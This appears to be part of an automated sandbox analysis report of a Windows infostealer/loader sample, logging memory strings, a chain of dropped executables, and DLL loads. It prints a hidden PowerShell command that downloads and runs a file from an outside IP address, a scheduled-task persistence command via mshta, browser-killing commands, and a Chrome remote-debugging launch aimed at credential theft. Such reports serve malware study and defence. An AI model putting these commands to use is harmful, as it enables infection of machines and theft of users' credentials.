Source: AGDDD2MYZL6KQO94XW.exe, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186062529.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186528818.000000006C59F000.00000002.00000001.01000000.0000000E.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2180558881.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186062529.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2180558881.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186062529.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186528818.000000006C59F000.00000002.00000001.01000000.0000000E.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2180558881.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: random.exe, 00000000.00000003.1729861104.0000000005515000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1729250606.0000000005547000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000003.2059488129.0000000005BC5000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2423138155.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2436330397.0000000005398000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2528096774.0000000005A85000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2526563604.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2737251405.0000000005626000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2761752864.0000000005609000.00000004.00000800.00020000.00000000.sdmp, tmp7AEE.tmp.14.dr, tmpC8B4.tmp.14.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186062529.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2180558881.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186062529.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2180558881.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: random.exe

Virustotal: Detection: 52%

Source: AGDDD2MYZL6KQO94XW.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: HYCURX00F7L1ZQ3FYN.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\user\Desktop\random.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe "C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe "C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe"
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2076,i,11199878792390717123,11116192396137881968,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe "C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe "C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe "C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe"
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe "C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe "C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe "C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe"
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe "C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe "C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe"
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe "C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2212 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a2266e4-e5c8-46c4-9ed2-0ac5c5747635} 7580 "\\.\pipe\gecko-crash-server-pipe.7580" 24596270d10 socket
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE "C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe "C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe "C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe "C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe "C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3824 -parentBuildID 20230927232528 -prefsHandle 4176 -prefMapHandle 4172 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1747f5ed-c481-48a3-bac7-b516bc97bf80} 7580 "\\.\pipe\gecko-crash-server-pipe.7580" 245a8122e10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5564 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5432 -prefMapHandle 5544 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91d2bf84-dcf7-46d6-a793-f4350282039f} 7580 "\\.\pipe\gecko-crash-server-pipe.7580" 245a6c4c310 utility
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process created: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe "C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe"
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe "C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe"	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe "C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2076,i,11199878792390717123,11116192396137881968,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe "C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe "C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe "C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe "C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe "C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe "C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe "C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe "C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe "C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe "C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process created: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe "C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe"
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE "C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2212 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a2266e4-e5c8-46c4-9ed2-0ac5c5747635} 7580 "\\.\pipe\gecko-crash-server-pipe.7580" 24596270d10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3824 -parentBuildID 20230927232528 -prefsHandle 4176 -prefMapHandle 4172 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1747f5ed-c481-48a3-bac7-b516bc97bf80} 7580 "\\.\pipe\gecko-crash-server-pipe.7580" 245a8122e10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5564 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5432 -prefMapHandle 5544 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91d2bf84-dcf7-46d6-a793-f4350282039f} 7580 "\\.\pipe\gecko-crash-server-pipe.7580" 245a6c4c310 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: C:\Users\user\Desktop\random.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
